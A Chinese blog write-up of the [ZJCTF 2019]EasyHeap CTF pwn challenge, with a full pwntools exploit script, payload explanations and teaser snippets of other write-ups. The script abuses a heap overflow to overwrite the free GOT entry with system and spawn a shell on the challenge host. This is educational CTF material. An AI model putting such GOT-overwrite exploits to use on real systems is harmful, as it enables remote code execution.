[ZJCTF 2019]EasyHeap

最新推荐文章于 2025-03-13 22:29:08 发布
原创 最新推荐文章于 2025-03-13 22:29:08 发布 · 198 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

该博客介绍了如何利用程序中的堆溢出漏洞和没有PIE特性,通过修改GOT表来植入后门。首先,通过添加、编辑和释放堆块来构造条件,然后通过编辑操作修改指定chunk的size字段,再伪造chunk以指向free函数的GOT入口,最后通过再次编辑和释放操作触发系统调用,实现远程代码执行。

国际惯例

在这里插入图片描述

ida

在这里插入图片描述
后门
在这里插入图片描述
有cat flag 因为平台是buu所以不考虑能打印flag,别问为什么!

add
在这里插入图片描述
edit
在这里插入图片描述
del

在这里插入图片描述
思路
有堆溢出而且没有PIE,那大概是改写got表了。

WP

from pwn import *
p = remote('node3.buuoj.cn',28946)
elf =ELF('./easyheap')

def add(size,content):
	p.recvuntil('Your choice :')
	p.sendline('1')
	p.recvuntil('Size of Heap : ')
	p.send(str(size))
	p.recvuntil('Content of heap:')
	p.send(str(content))	

def edit(index,size,content):
	p.recvuntil('Your choice :')
	p.sendline('2')
	p.recvuntil('Index :')
	p.sendline(str(index))
	p.recvuntil('Size of Heap : ')
	p.send(str(size))
	p.recvuntil('Content of heap : ')
	p.send(str(content))

def free(index):
	p.recvuntil('Your choice :')
	p.sendline('3')
	p.recvuntil('Index :')
	p.sendline(str(index))

free_got = elf.got['free']
add(0x68,'aaaa')#0
add(0x68,'bbbb')#1
add(0x68,'cccc')#2
free(2)
payload = '/bin/sh\x00' + 'a' * 0x60 + p64(0x71) + p64(0x6020ad)
edit(1,len(payload),payload)#添加后门
add(0x68,'aaaa')#申请回chunk2
add(0x68,'c')#构造伪堆块
payload = '\xaa' * 3 + p64(0) * 4 + p64(free_got)
edit(3,len(payload),payload)
payload = p64(elf.plt['system'])
edit(0,len(payload),payload)
free(1)
p.interactive()

总结:

payload = '/bin/sh\x00' + 'a' * 0x60 + p64(0x71) + p64(0x6020ad)

填入后门bin,并溢出修改chunk2的size位,0x6020ad为伪造chunk的地方。

payload = '\xaa' * 3 + p64(0) * 4 + p64(free_got)

通过伪造的chunk修改chunk0的地址为free_got。

BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2986
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 1116
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
BUUCTF Pwn [ZJCTF 2019]EasyHeap unlink+freehook做法
最新发布
qq_33348179的博客
03-13 346
后续修改0x6020E0的位置为freehook 再修改一次 让其指向system 最后free掉chunk2 就能执行binsh了。delete_heap函数已经将指针清零 无UAF。edit_heap允许自己输入读取字节 存在堆溢出。同时 存储的指针位于bss段。
ZJCTF2019EasyHeap
03-27
题目描述 请使用C++实现一个简单的堆,完成以下操作: 1.插入一个元素 2.删除堆顶元素 3.输出堆中元素的个数 4.输出堆中所有元素 ...2.堆中每个节点的值都大于等于其左右子节点的值;...C++ 代码
pwn】[ZJCTF 2019]EasyHeap --fastbin攻击,house of spirit
question55的博客
12-22 1144
/ 往堆中读入数据。
[ZJCTF 2019]EasyHeap-patchlibc-调试
个人笔记
04-25 738
后面只用关注伪造的fd地址0x6020C8即可,也即是heaparray_addr - 0x18。heaparray_addr = malloc(chunk0)这里获得的就是&chunk[0];1、伪造chunk[2]=[全局地址-3];chunk[3] = [全局地址-2]通过修改chunk[3]的值 ->控制 &chunk[0] ->4、给任意地址填入内容,chunk[0] = [任意内容]3、填入控制任意地址,chunk[3] = [任意地址]chunk[3] ->实现[任意地址]写。
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 406
BUUCTF 做题练习
heap2-[ZJCTF 2019]EasyHeap
qq_51687381的博客
07-27 269
做题先check找攻击手段,Partial RELRP ->修改got表 菜单题,直接找准delete看看有没有UAF。 UAF未果。 但是在Edit_heap中存在漏洞。 这里看起来是以为可以修改heap的size,其实这个size是用来对你的输入进行限制的。(栈溢出就在这里把size写的很大,方便我们写入) 而且这个程序写的也有点问题。 它会让你修改chunk的信息域 所以 wp from pwn import * sh = remote("node4....
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 1138
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
[ZJCTF 2019]EasyHeap-house of spirit
huzai9527的博客
03-15 314
[ZJCTF 2019]EasyHeap-house of spirit 先给出exp,exp中我标明了每一个步骤 每个步骤执行完后,内存中的地址空间我也贴出来了 exp from pwn import * p = remote('node3.buuoj.cn',29012) #p = process('./easyheap') context.log_level = 'debug' def creat(size,content): p.sendlineafter('Your choice :',st
pwn入门堆题[ZJCTF 2019]EasyHeap
m0_73575406的博客
01-25 774
buuctf上一道简单的堆题wp,希望对新手有帮助(虽然我也只是刚学不久的新手啦QAQ),非常简单的利用方式,比uaf还简单(看wp前建议去wiki了解一下unsortedbin的相关知识)。
BUUCTF-[ZJCTF 2019]EasyHeap1
Rt1Text的博客
09-25 1165
经典堆菜单。
easy_heap
JackBoy的博客
12-04 397
easy_heap  题目保护全开,在malloc的时候存在null-by-one漏洞,由于分配的堆块的大小都是0x100(加堆头),所以null-by-one漏洞只会覆盖下个堆块的prev_inuse标志位为0。一般的利用思路是通过伪造prev_size的大小来构造overlap-chunk为所欲为,但是这种思路在这道题目里行不通,因为malloc在读取内容的时候‘\0’会截断而且堆块大小是0...
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 2176
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值